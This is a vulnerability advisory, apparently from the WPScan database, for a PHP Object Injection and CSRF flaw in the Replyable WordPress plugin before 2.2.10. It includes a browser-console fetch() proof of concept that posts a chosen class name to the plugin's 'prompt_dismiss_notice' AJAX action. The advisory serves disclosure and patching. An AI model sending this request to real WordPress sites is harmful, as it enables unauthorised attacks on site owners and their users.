Lucene search

K
wpvulndbLana CodesWPVDB-ID:095CBA08-7EDD-41FB-9776-DA151C0885DD
HistoryFeb 08, 2023 - 12:00 a.m.

Replyable < 2.2.10 - Subscriber+ PHP Object Injection

2023-02-0800:00:00
Lana Codes
wpscan.com
3
replyable
2.2.10
subscriber
php
object injection
csrf
authenticated users
poc
malicious
web browser
ajax
headers
csrf vector
developer console

0.001 Low

EPSS

Percentile

36.6%

The plugin does not validate the class name submitted by the request when instantiating an object in the prompt_dismiss_notice action and also lacks CSRF check in the related action. This could allow any authenticated users, such as subscriber to perform Object Injection attacks. The attack could also be done via a CSRF vector against any authenticated user

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user fetch(‘http://wpscan.local/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=prompt_dismiss_notice&class;=Malicious’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));

CPENameOperatorVersion
postmaticlt2.2.10

0.001 Low

EPSS

Percentile

36.6%

Related for WPVDB-ID:095CBA08-7EDD-41FB-9776-DA151C0885DD